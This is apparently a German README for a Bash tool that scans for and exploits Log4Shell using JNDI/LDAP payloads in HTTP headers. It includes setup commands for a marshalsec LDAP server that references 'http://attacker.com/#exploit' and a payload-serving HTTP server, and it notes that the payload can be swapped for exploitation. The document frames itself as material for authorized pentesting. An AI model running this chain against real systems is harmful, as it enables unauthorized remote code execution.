Log4Shell-Scanner-Exploit
Bash-Skript, das es ermöglicht, die Log4shell-Schwachstelle remote zu identifizieren und/oder auszunutzen.
Dieses Tool führt verschiedene Tests mit LDAP-Payloads und den Headern X-Api-Version, User-Agent und X-Forwarded-For durch.
Dieses Skript immer nur mit vorheriger Genehmigung des Eigentümers des geprüften Dienstes/der geprüften Anwendung verwenden.
Abhängigkeiten:
- Wir erstellen einen vorkonfigurierten LDAP-Server von Github: https://github.com/mbechler/marshalsec
mvn clean package -DskipTests && Java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar
marshalsec.jndi.LDAPRefServer 'http://attacker.com/#exploit'
-
Wir aktivieren einen HTTP-Server
python3 -m http.server 8080
-
Java installiert haben
#sudo apt install default-jre
-
Curl installiert haben
#sudo apt-get install curl
Anwendungsbeispiel:
Folgende Parameter eingeben:
- Liste der zu scannenden URLs
- IP-Adresse des LDAP-Servers
- Port des LDAP-Servers
- IP-Adresse des HTTP-Servers
- Port des HTTP-Servers
#Beispiel Scan einer Anwendung im internen Netzwerk:
- ./Log4Shell_Scanner.sh <Diccionario_URL> <IP_Servidor_LDAP> <Puerto_Servidor_LDAP> <IP_Servidor_HTTP> <Puerto_Servidor_HTTP>

#Beispiel Scan einer Anwendung im Internet:
- ./Log4Shell_Scanner.sh <Diccionario_URL> <IP_Servidor_LDAP> <Puerto_Servidor_LDAP> <IP_Servidor_HTTP> <Puerto_Servidor_HTTP>

Hinweise:
- Der verwendete Payload sendet den Befehl "ifconfig" an die als verwundbar identifizierten Maschinen. Dieser Payload ist Base64-kodiert und kann geändert werden, um die Exploitationsphase in einem Pentesting-Audit durchzuführen.
- Wenn das Tool für Internetdienste verwendet werden soll, kann ein Ngrok-Dienst gestartet werden, der ein Port-Forwarding zum lokalen Port des LDAP-Servers durchführt.
- Dieses Skript immer nur mit vorheriger Genehmigung des Eigentümers des geprüften Dienstes/der geprüften Anwendung verwenden.